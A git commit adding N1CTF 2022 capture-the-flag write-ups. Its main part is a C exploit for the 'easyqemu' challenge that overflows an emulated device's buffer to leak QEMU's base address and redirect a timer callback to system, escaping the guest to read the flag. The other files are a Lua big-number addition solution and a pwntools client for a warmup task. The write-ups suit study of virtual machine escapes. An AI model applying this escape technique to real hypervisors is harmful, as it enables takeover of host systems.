n1ctf writeups sampriti

bb33bb · Nov 9, 2022 · 4aef3f6 · 4aef3f6
1 parent 0137ea7
commit 4aef3f6
Show file tree

Hide file tree

Showing 5 changed files with 126 additions and 0 deletions.
diff --git a/2022/n1ctf-2022/easyqemu/README.md b/2022/n1ctf-2022/easyqemu/README.md
@@ -0,0 +1,6 @@
+easyqemu
+========
+
+Bug in PMIO handler that lets us overflow while memcpy-ing because we can set arbitrary lengths.
+
+This lets us read and write to the QEMUTimer object right after the buffer. We can leak the PIE address and then change it to system to run the command `/cat flag`
diff --git a/2022/n1ctf-2022/easyqemu/solve.c b/2022/n1ctf-2022/easyqemu/solve.c
@@ -0,0 +1,64 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <stdint.h>
+#include <string.h>
+#include <sys/io.h>
+
+uint64_t PORT_BASE = 0xc040;
+
+unsigned int DELAY = 200 * 1000;
+
+int main() {
+  if (iopl(3) !=0 ) {
+    printf("iopl err\n");
+  }
+  int fd = open("/sys/devices/pci0000:00/0000:00:02.0/resource0", O_RDWR | O_SYNC);
+  printf("Fd: %d\n", fd);
+  void* mmio = mmap(0, 0x100000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+  printf("Mmio: %p\n", mmio);
+
+  uint64_t* dma = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  memset(dma, 0, sizeof(dma));
+
+  uint64_t paddr;
+  virt_to_phys_user(&paddr, getpid(), (uintptr_t)dma);
+  printf("Virt: %p Phys: %p\n", dma, paddr);
+
+  outl(paddr, PORT_BASE + 28);    // cpu_addr_out
+  outl(0x1000, PORT_BASE + 24);   // cpu_addr_lim
+  outl(0x1000, PORT_BASE + 36);   // cpu_addr_len
+  outb(1, PORT_BASE + 20);        // cpu_addr_dir
+
+  outl(0x1000 + 0x30, PORT_BASE + 12);    // buf2 -> buf1
+  outl(0x1000 + 0x30, PORT_BASE + 12);    // buf2 -> buf1
+
+  outb(1, PORT_BASE + 8);   // TRIGGER
+
+  usleep(DELAY);
+
+  for (int i = 0; i < 10; i++) {
+    printf("%p\n", dma[i]);
+  }
+
+  uint64_t pie_base = dma[2] - 0x45fe46;
+  uint64_t opaque = dma[3];
+
+  dma[2] = pie_base + 0x2d2f80;
+  dma[3] = opaque + 0x1d20 + 0x800;
+  strcpy((char*)&dma[256], "cat /flag");
+
+  outb(0, PORT_BASE + 20);        // cpu_addr_dir
+  outb(1, PORT_BASE + 8);   // TRIGGER
+
+  usleep(DELAY);
+
+  outl(0x1000 + 0x30, PORT_BASE + 16);    // buf1 -> buf2
+  outl(0x1000 + 0x30, PORT_BASE + 16);    // buf1 -> buf2
+
+  outb(1, PORT_BASE + 8);   // TRIGGER
+
+  puts("done");
+  getchar();
+}
diff --git a/2022/n1ctf-2022/n1oj_warmup/README.md b/2022/n1ctf-2022/n1oj_warmup/README.md
@@ -0,0 +1,4 @@
+n1oj_warmup
+===========
+
+Just implement basic BigInteger addition in Lua.
diff --git a/2022/n1ctf-2022/n1oj_warmup/soln.lua b/2022/n1ctf-2022/n1oj_warmup/soln.lua
@@ -0,0 +1,31 @@
+a = gets()
+b = gets()
+
+a = string.reverse(a)
+b = string.reverse(b)
+
+while string.len(a) < string.len(b) do
+    a = a .. "0"
+end
+
+while string.len(b) < string.len(a) do
+    b = b .. "0"
+end
+
+ans = ""
+carry = 0
+i = 1
+while i <= string.len(a) do
+    x = string.byte(a, i) - 48
+    y = string.byte(b, i) - 48 
+    curr = x + y + carry
+    ans = ans .. string.char((curr % 10) + 48)
+    carry = curr // 10
+    i = i + 1
+end
+if carry > 0 then
+    ans = ans .. string.char(carry + 48)
+end
+ans = string.reverse(ans)
+print(ans)
+
diff --git a/2022/n1ctf-2022/n1oj_warmup/solve.py b/2022/n1ctf-2022/n1oj_warmup/solve.py
@@ -0,0 +1,21 @@
+from pwn import *
+from gmpy2 import *
+
+proc = remote("43.154.211.24", 2333)
+
+a = proc.recvline().strip().decode()
+exp = int(a.split()[1].split('^')[-1][:-1])
+mod = int(a.split()[3])
+print(exp, mod)
+
+ans = pow(mpz(2), pow(mpz(2), mpz(exp)), mpz(mod))
+proc.sendline(str(ans))
+
+print(proc.recvline())
+print(proc.recvline())
+
+soln = open("soln.lua", "rb").read()
+proc.send(p32(len(soln)))
+proc.send(soln)
+
+proc.interactive()